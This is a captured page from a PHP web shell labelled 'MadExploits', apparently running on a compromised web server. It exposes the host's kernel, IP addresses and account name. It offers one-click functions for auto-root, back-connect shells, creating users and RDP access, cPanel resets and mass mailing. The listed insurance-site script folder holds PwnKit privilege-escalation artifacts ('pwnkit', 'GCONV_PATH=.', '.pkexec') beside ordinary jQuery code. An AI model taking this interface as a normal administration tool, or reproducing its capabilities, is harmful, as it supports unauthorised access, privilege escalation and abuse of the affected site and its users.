Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 3.16.157.177
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
insurance /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
common-backend.js
1015
B
-rw-r--r--
common-nackend-end-backend.js
1.91
KB
-rw-r--r--
custom.js
2.86
KB
-rw-r--r--
dashbord.js
3.65
KB
-rw-r--r--
email-quotes-backend.js
1.53
KB
-rw-r--r--
helpers.js
23.45
KB
-rw-r--r--
insurance-listing-page.js
7.36
KB
-rw-r--r--
insurer-dashboard-backend.js
8.49
KB
-rw-r--r--
insurer-edit-backend.js
14.16
KB
-rw-r--r--
jquery-3.7.1.min.js
85.48
KB
-rw-r--r--
jquerydatatables2.0.8.min.js
88.28
KB
-rw-r--r--
messages-backend.js
2.28
KB
-rw-r--r--
policy-backend.js
2.96
KB
-rw-r--r--
policy-dashboard-backend.js
2.52
KB
-rw-r--r--
policy-edit-backend.js
2.25
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
qoutejs.js
7.67
KB
-rw-r--r--
sweetalert.min.js
39.85
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : email-quotes-backend.js
$(document).ready(function() { var table = $('#email-table').DataTable({ "columnDefs": [ { "targets": 1, // The index of the checkbox column (second column, so index is 1) "orderable": false // Disable sorting on this column }, { "targets": 0, // The index of the Sr. column (first column, so index is 0) "visible": false // Hide the Sr. column } ], "initComplete": function () { // Add a placeholder to the search input $('#email-table_wrapper .dt-search input').attr('placeholder', 'Search Email Quotes...'); } }); }); document.addEventListener('DOMContentLoaded', function () { const checkAll = document.getElementById('check-all'); const checkboxes = document.querySelectorAll('.row-checkbox'); const deleteButtonContainer = document.getElementById('delete-button-container'); // Function to show/hide delete button based on selection function toggleDeleteButton() { const anyChecked = [...checkboxes].some(checkbox => checkbox.checked); deleteButtonContainer.style.display = anyChecked ? 'block' : 'none'; } // Handle "check all" functionality checkAll.addEventListener('change', function () { const checkedStatus = this.checked; checkboxes.forEach(checkbox => checkbox.checked = checkedStatus); toggleDeleteButton(); }); // Handle individual checkbox changes checkboxes.forEach(checkbox => { checkbox.addEventListener('change', function () { toggleDeleteButton(); }); }); });
Close